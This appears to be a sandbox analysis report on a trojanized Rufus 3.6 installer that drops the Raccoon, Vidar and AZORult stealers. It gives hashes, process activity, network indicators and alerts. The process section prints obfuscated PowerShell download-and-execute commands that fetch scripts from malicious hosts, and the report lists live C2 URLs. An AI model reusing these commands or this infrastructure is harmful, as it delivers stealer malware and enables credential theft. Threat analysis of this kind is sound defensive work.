File name: rufus-3.6.exe
Full analysis: https://app.any.run/tasks/f319ca7c-7f36-4099-a87d-a0761316996c
Verdict: Malicious activity
Threats:

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Analysis date: August 08, 2020, 10:25:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: trojan, stealer, raccoon, rat, azorult, vidar, loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5: FCB9B4A7E6923C8BCFFD26ABE6B5008B
SHA1: BCD676A08B9E076725E5D1185085A2E13A03FA56
SHA256: 6F89C43EB5E4F901D016894089D35CC48911A5FEB7E8A2403C4B187BAB13F938
SSDEEP: 24576:4ji+2seLAj/gHMBcUdWJaa+KFe1T2rreo/TVVjdh:4ji+BjYHMmUdWJajTKeoLV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • rufus-3.6.exe (PID: 2848)
      • rufus-3.6.exe (PID: 976)
      • rufus-3.6.exe (PID: 2232)
      • pqz.exe (PID: 2400)
      • Pvjkdebv.exe (PID: 2248)
      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 956)
      • Pvjadebv.exe (PID: 2360)
      • Pvjadebv.exe (PID: 3020)
      • ZsN4wOiOUk.exe (PID: 2404)
      • 2qsblmEdg9.exe (PID: 3148)
      • uFPEgNsrei.exe (PID: 3256)
      • 1v1DzM02SI.exe (PID: 2720)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2196)
    • Changes Windows auto-update feature

      • rufus-3.6.exe (PID: 2232)
    • Disables Windows Defender

      • rufus-3.6.exe (PID: 2232)
    • Changes settings of System certificates

      • rufus-3.6.exe (PID: 2232)
    • AZORULT was detected

      • Pvjadebv.exe (PID: 3020)
    • Connects to CnC server

      • pqz.exe (PID: 2600)
      • Pvjadebv.exe (PID: 3020)
    • RACCOON was detected

      • pqz.exe (PID: 2600)
    • Downloads executable files from the Internet

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)
    • Loads dropped or rewritten executable

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)
    • VIDAR was detected

      • Pvjkdebv.exe (PID: 2248)
    • Downloads executable files from IP

      • pqz.exe (PID: 2600)
    • Stealing of credential data

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)
    • Actions look like stealing of personal data

      • Pvjkdebv.exe (PID: 2248)
      • pqz.exe (PID: 2600)
  • SUSPICIOUS

    • Starts CMD.EXE for command execution

      • rufus-3.6.exe (PID: 2872)
      • Pvjkdebv.exe (PID: 2248)
      • pqz.exe (PID: 2600)
    • Executable content was dropped or overwritten

      • rufus-3.6.exe (PID: 2872)
      • powershell.exe (PID: 2816)
      • pqz.exe (PID: 2400)
      • Pvjkdebv.exe (PID: 2248)
      • pqz.exe (PID: 2600)
    • Creates files in the user directory

      • powershell.exe (PID: 3172)
      • powershell.exe (PID: 2436)
      • powershell.exe (PID: 2816)
    • Application launched itself

      • Pvjkdebv.exe (PID: 956)
      • pqz.exe (PID: 2400)
      • Pvjadebv.exe (PID: 2360)
    • Reads Internet Cache Settings

      • rufus-3.6.exe (PID: 2232)
      • Pvjkdebv.exe (PID: 2248)
      • Pvjadebv.exe (PID: 3020)
      • pqz.exe (PID: 2600)
      • ZsN4wOiOUk.exe (PID: 2404)
    • Adds / modifies Windows certificates

      • rufus-3.6.exe (PID: 2232)
    • Creates files in the program directory

      • Pvjkdebv.exe (PID: 2248)
    • Connects to server without host name

      • pqz.exe (PID: 2600)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • pqz.exe (PID: 2600)
    • Reads the cookies of Google Chrome

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)
    • Searches for installed software

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)
    • Reads the cookies of Mozilla Firefox

      • pqz.exe (PID: 2600)
      • Pvjkdebv.exe (PID: 2248)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 2472)
    • Starts CMD.EXE for self-deleting

      • pqz.exe (PID: 2600)
  • INFO

    • Reads settings of System Certificates

      • rufus-3.6.exe (PID: 2232)
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (39.3)
.exe | Win32 EXE Yoda's Crypter (38.6)
.dll | Win32 Dynamic Link Library (generic) (9.5)
.exe | Win32 Executable (generic) (6.5)
.exe | Generic Win/DOS Executable (2.9)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2015:04:18 14:16:08+02:00
PEType: PE32
LinkerVersion: 2.5
CodeSize: 1138688
InitializedDataSize: 36864
UninitializedDataSize: 98304
EntryPoint: 0x12d5e0
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 18-Apr-2015 12:16:08

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 18-Apr-2015 12:16:08
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy
UPX0 | 0x00001000 | 0x00018000 | 0x00000000 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0
UPX1 | 0x00019000 | 0x00116000 | 0x00115200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.99979
.rsrc | 0x0012F000 | 0x00009000 | 0x00009000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.80667

Resources

Title | Entropy | Size | Codepage | Language | Type
1 | 4.92322 | 611 | Latin 1 / Western European | UNKNOWN | RT_MANIFEST
2 | 3.68423 | 9640 | Latin 1 / Western European | UNKNOWN | RT_ICON
3 | 3.77127 | 4264 | Latin 1 / Western European | UNKNOWN | RT_ICON
4 | 3.98144 | 2440 | Latin 1 / Western European | UNKNOWN | RT_ICON
5 | 4.04318 | 1128 | Latin 1 / Western European | UNKNOWN | RT_ICON
B | 6.05463 | 78 | Latin 1 / Western European | UNKNOWN | RT_RCDATA
D | 3.80735 | 14 | Latin 1 / Western European | UNKNOWN | RT_RCDATA
F | 7.96507 | 1142956 | Latin 1 / Western European | UNKNOWN | RT_RCDATA
I | 6.45459 | 112 | Latin 1 / Western European | UNKNOWN | RT_RCDATA
N | 4.32193 | 20 | Latin 1 / Western European | UNKNOWN | RT_RCDATA

Imports

COMCTL32.dll
GDI32.dll
KERNEL32.DLL
MSVCRT.dll
OLE32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
No data.
Total processes: 68
Monitored processes: 22
Malicious processes: 10
Suspicious processes: 0

Behavior graph

(process tree graphic not reproduced; nodes shown, in graph order: rufus-3.6.exe, cmd.exe, powershell.exe (x3), rufus-3.6.exe (x3), pqz.exe, pvjkdebv.exe, pvjadebv.exe, pqz.exe #RACCOON, pvjkdebv.exe #VIDAR, pvjadebv.exe #AZORULT, cmd.exe, taskkill.exe, zsn4woiouk.exe, 2qsblmedg9.exe, 1v1dzm02si.exe, ufpegnsrei.exe, cmd.exe, timeout.exe)

Process information

PID: 2872
CMD: "C:\Users\admin\AppData\Local\Temp\rufus-3.6.exe"
Path: C:\Users\admin\AppData\Local\Temp\rufus-3.6.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 2196
CMD: cmd /c ""C:\Users\admin\AppData\Local\Temp\11A9.tmp\start.bat" C:\Users\admin\AppData\Local\Temp\rufus-3.6.exe"
Path: C:\Windows\system32\cmd.exe
Parent process: rufus-3.6.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2436
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $iq=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $iq;$skh=((New-Object Net.WebClient)).DownloadString('http://bit.do/e2q3W');s $skh
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3172
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $dr=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $dr;$sv=((New-Object Net.WebClient)).DownloadString('http://bit.do/e2q4h');s $sv
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2816
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $pz=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $pz;$sy=((New-Object Net.WebClient)).DownloadString('http://opesjk.ug/asdf.ps1');s $sy
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2848
CMD: rufus-3.6.exe
Path: C:\Users\admin\AppData\Local\Temp\11A9.tmp\rufus-3.6.exe
Parent process: cmd.exe
User: admin
Company: Akeo Consulting
Integrity Level: MEDIUM
Description: Rufus
Exit code: 3221226540
Version: 3.6.1551

PID: 976
CMD: "C:\Users\admin\AppData\Local\Temp\11A9.tmp\rufus-3.6.exe"
Path: C:\Users\admin\AppData\Local\Temp\11A9.tmp\rufus-3.6.exe
Parent process: cmd.exe
User: admin
Company: Akeo Consulting
Integrity Level: MEDIUM
Description: Rufus
Exit code: 3221226540
Version: 3.6.1551

PID: 2232
CMD: "C:\Users\admin\AppData\Local\Temp\11A9.tmp\rufus-3.6.exe"
Path: C:\Users\admin\AppData\Local\Temp\11A9.tmp\rufus-3.6.exe
Parent process: cmd.exe
User: admin
Company: Akeo Consulting
Integrity Level: HIGH
Description: Rufus
Version: 3.6.1551

PID: 2400
CMD: "C:\Users\Public\pqz.exe"
Path: C:\Users\Public\pqz.exe
Parent process: powershell.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0
Version: 4175.2546.7542

PID: 956
CMD: "C:\Users\admin\AppData\Local\Temp\Pvjkdebv.exe"
Path: C:\Users\admin\AppData\Local\Temp\Pvjkdebv.exe
Parent process: pqz.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0
Version: 2778.4422.7835
Total events: 3 113
Read events: 2 822
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 79
Suspicious files: 16
Text files: 24
Unknown types: 8

Dropped files

PID | Process | Filename | Type
2436 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TGP1W3NJSM76BG422IE3.temp | -
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N48OC5W7BT37EESY1LSQ.temp | -
2816 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QEWXZZES08QPS5SYLUD3.temp | -
2232 | rufus-3.6.exe | C:\Users\admin\AppData\Local\Temp\Cab3DEB.tmp | -
2232 | rufus-3.6.exe | C:\Users\admin\AppData\Local\Temp\Tar3DEC.tmp | -
2232 | rufus-3.6.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\Fido[1].ver | -
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\a8204fabd87c2f30.customDestinations-ms | binary
    MD5: BA78F5C7C9CF99CCA8EBC8C6FE2024D0
    SHA256: 720AAFC723F8809858D024BDD80454C4D8F1A1AE2ED45AAAC06A78B2DD06BA77
2872 | rufus-3.6.exe | C:\Users\admin\AppData\Local\Temp\11A9.tmp\start.bat | text
    MD5: FCFD92442D1B5968E4FA816E2105F5C7
    SHA256: 7348BDDD92276514AAE87A8FA7122202E8B5567E1E4763770FC9F349D0D6B0E3
2872 | rufus-3.6.exe | C:\Users\admin\AppData\Local\Temp\11A9.tmp\1.lnk | lnk
    MD5: 3929DAD4933A371C31FC75C3B254D561
    SHA256: 3C22D38A46AAE66822B705B080970639FCE60B9977033F6EFD96DA49CF6529EF
2232 | rufus-3.6.exe | C:\Users\admin\AppData\Local\Temp\Ruf1E0D.tmp | text
    MD5: 7B64F60090644983A9110506EDDA375C
    SHA256: A44694A98C26E0252AEDC4CE3D60421EB567A42C90FC1B11824B4BC9E9A6B6AF
HTTP(S) requests: 27
TCP/UDP connections: 18
DNS requests: 13
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2816 | powershell.exe | GET | 200 | 217.8.117.77:80 | http://opesjk.ug/asdf.ps1 | unknown | text | 1.54 Mb | malicious
2232 | rufus-3.6.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTuqL92L3tjkN67RNFF%2FEdvT6NEzAQUwBKyKHRoRmfpcCV0GgBFWwZ9XEQCEAgt9o7pxpMVvr9yB5s4EP0%3D | US | der | 471 b | whitelisted
2436 | powershell.exe | GET | 301 | 54.83.52.76:80 | http://bit.do/e2q3W | US | html | 308 b | shared
3172 | powershell.exe | GET | 301 | 54.83.52.76:80 | http://bit.do/e2q4h | US | html | 309 b | shared
3020 | Pvjadebv.exe | POST | 200 | 217.8.117.77:80 | http://michaeldiamantis.ug/index.php | unknown | text | 4 b | malicious
2232 | rufus-3.6.exe | GET | 200 | 2.16.186.35:80 | http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D | unknown | der | 1.37 Kb | whitelisted
3172 | powershell.exe | GET | 200 | 194.85.61.76:80 | http://partaususd.ru/asdf.ps1 | RU | html | 1.06 Kb | malicious
2232 | rufus-3.6.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8%3D | US | der | 471 b | whitelisted
2600 | pqz.exe | GET | 200 | 34.65.10.107:80 | http://34.65.10.107/gate/sqlite3.dll | US | executable | 895 Kb | malicious
2248 | Pvjkdebv.exe | POST | 200 | 217.8.117.77:80 | http://mantis.ug/nss3.dll | unknown | executable | 1.19 Mb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2232 | rufus-3.6.exe | 185.199.111.153:443 | rufus.ie | GitHub, Inc. | NL | shared
2816 | powershell.exe | 217.8.117.77:80 | opesjk.ug | - | - | malicious
3172 | powershell.exe | 194.85.61.76:80 | partaususd.ru | Jsc ru-center | RU | malicious
2232 | rufus-3.6.exe | 2.16.186.35:80 | isrg.trustid.ocsp.identrust.com | Akamai International B.V. | - | whitelisted
2232 | rufus-3.6.exe | 140.82.118.4:443 | github.com | - | US | malicious
2436 | powershell.exe | 54.83.52.76:80 | bit.do | Amazon.com, Inc. | US | shared
3172 | powershell.exe | 54.83.52.76:80 | bit.do | Amazon.com, Inc. | US | shared
2600 | pqz.exe | 217.8.117.77:80 | opesjk.ug | - | - | malicious
3020 | Pvjadebv.exe | 217.8.117.77:80 | opesjk.ug | - | - | malicious
2600 | pqz.exe | 34.65.10.107:80 | - | - | US | malicious

DNS requests

Domain | IP | Reputation
bit.do | 54.83.52.76 | shared
marksidfg.ug | - | malicious
opesjk.ug | 217.8.117.77 | malicious
partaususd.ru | 194.85.61.76, 109.70.26.37 | malicious
rufus.ie | 185.199.111.153, 185.199.109.153, 185.199.110.153, 185.199.108.153 | suspicious
isrg.trustid.ocsp.identrust.com | 2.16.186.35, 2.16.186.11 | whitelisted
github.com | 140.82.118.4 | shared
ocsp.digicert.com | 93.184.220.29 | whitelisted
github-production-release-asset-2e65be.s3.amazonaws.com | 52.217.64.44 | shared
telete.in | 195.201.225.248 | shared

Threats

PID | Process | Class | Message
2436 | powershell.exe | Misc activity | ET INFO Bit.do Shortened Link Request (set)
3172 | powershell.exe | Misc activity | ET INFO Bit.do Shortened Link Request (set)
2816 | powershell.exe | A Network Trojan was detected | ET TROJAN Windows executable base64 encoded
2816 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Script/Oneeva.A!ml
2816 | powershell.exe | Misc activity | ET POLICY EXE Base64 Encoded potential malware
2600 | pqz.exe | A Network Trojan was detected | AV TROJAN Trojan-Spy.MSIL.Stealer.ahp CnC Checkin
2600 | pqz.exe | A Network Trojan was detected | STEALER [PTsecurity] Raccoon
2600 | pqz.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host DLL Request
2600 | pqz.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3020 | Pvjadebv.exe | A Network Trojan was detected | ET TROJAN Win32/AZORult V3.3 Client Checkin M2
20 ETPRO signatures available at the full report
Process | Message
rufus-3.6.exe | *** Rufus init ***
rufus-3.6.exe | Binary executable is signed by 'Akeo Consulting'
rufus-3.6.exe | Binary executable is signed by 'Akeo Consulting'
rufus-3.6.exe | Will use settings from registry
rufus-3.6.exe | loc file not found in current directory - embedded one will be used
rufus-3.6.exe | localization: extracted data to 'C:\Users\admin\AppData\Local\Temp\Ruf1E0D.tmp'
rufus-3.6.exe | localization: found locale 'en-US'
rufus-3.6.exe | localization: found locale 'ar-SA'
rufus-3.6.exe | localization: found locale 'bg-BG'
rufus-3.6.exe | localization: found locale 'zh-CN'